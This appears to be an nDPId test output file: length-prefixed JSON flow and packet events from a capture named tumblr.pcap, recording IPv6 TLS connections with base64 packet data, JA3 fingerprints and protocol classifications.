+00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1605292122501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":149,"pkt_l4_len":95,"thread_ts_msec":1605292122501,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMAF8GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MQoadXXNVgBgB9QaPAAABAQgKTYUvYcLdm\/0XAwMAOgAAAAAAAAAIvZM7k4G8cjK7Q9\/YrVI4eMbPvi74lWEwjtUtgcQJsZEKgX5x1KPe5+ARIWOSp6YRK8o="} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122674,"flow_last_seen":1605292122674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24688,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1605292122674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122674,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9u8AAAAAoAL9IJXTAAACBAWgBAIIChNnJ60AAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24691,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1605292122697,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122697,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGAGB0kqAcsBIEmLB5kd7IUo3\/YpAbuY\/FghbGM8FfbwoBJXgNHxAAACBAV4AQMDAwQCCArC3eI6E2cnrQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24692,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gD3A1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABgBgdJmPwBuzwV9vBYIWxkgBAB+1XrAAABAQgKE2cnxcLd4jo="} +00951{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24693,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122674,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":620,"flow_avg_l4_payload_len":155,"midstream":0,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122698,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a15","src_port":42674,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24694,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1605292122698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122698,"pkt":"qtsDr8lk5EKm5WPyht1gCuvGACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoVprIBu3ASIMYXhL6qgBAB9S93AAABAQgKNSTnjcLdLMU="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24706,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1605292122741,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122741,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPQBk\/5sAAAAAAAAAAEpymhUqAcsBIEmLB5kd7IUo3\/YpAbumsheEvqpwEiDHgBALdyXtAAABAQgKwt3iZjUkMfM="} +00990{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24707,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122674,"flow_last_seen":1605292122755,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":620,"flow_tot_l4_payload_len":890,"flow_avg_l4_payload_len":148,"midstream":0,"thread_ts_msec":1605292122755,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6006:749","src_port":39164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sb.scorecardresearch.com","ja3":"44d502d471cfdb99c59bdfb0f220e5a8","ja3s":"2253c82f03b621c5144709b393fde2c9","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122874,"flow_last_seen":1605292122874,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122874,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200a","src_port":40190,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24733,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1605292122874,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122874,"pkt":"qtsDr8lk5EKm5WPyht1gDJQ7ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAKnP4Bu4CgSN\/gvLosgBAB9qrlAAABAQgK1OQQnsLdMvM="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1605292122899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122899,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgKAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuc\/uC8uiyAoEjggBALQrp6AAABAQgKwt3jAtThR68="} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292118714,"flow_last_seen":1605292118786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":48988,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292120654,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00691{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00635{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605292103804,"flow_last_seen":1605292104013,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":664,"flow_tot_l4_payload_len":1202,"flow_avg_l4_payload_len":133,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2620:116:800d:21:8c6e:cf2c:8d6:9fb5","src_port":41266,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":76,"flow_first_seen":1605292102602,"flow_last_seen":1605292122470,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":35234,"flow_avg_l4_payload_len":463,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292114506,"flow_last_seen":1605292114736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56558,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56564,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108805,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56578,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108746,"flow_last_seen":1605292108789,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102219,"flow_last_seen":1605292102653,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56592,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00668{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00612{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292108747,"flow_last_seen":1605292108796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56594,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00717{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1605292105433,"flow_last_seen":1605292106000,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":7251,"flow_avg_l4_payload_len":233,"midstream":0,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2001:4998:14:800::1001","src_port":47118,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Yahoo","breed":"Safe","category":"Web"}} +00680{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00624{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1605292121674,"flow_last_seen":1605292122517,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":117,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":31,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00611{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292102603,"flow_last_seen":1605292102678,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:798c","src_port":56640,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49462,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00618{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":24745,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605292116554,"flow_last_seen":1605292116783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292122899,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49464,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 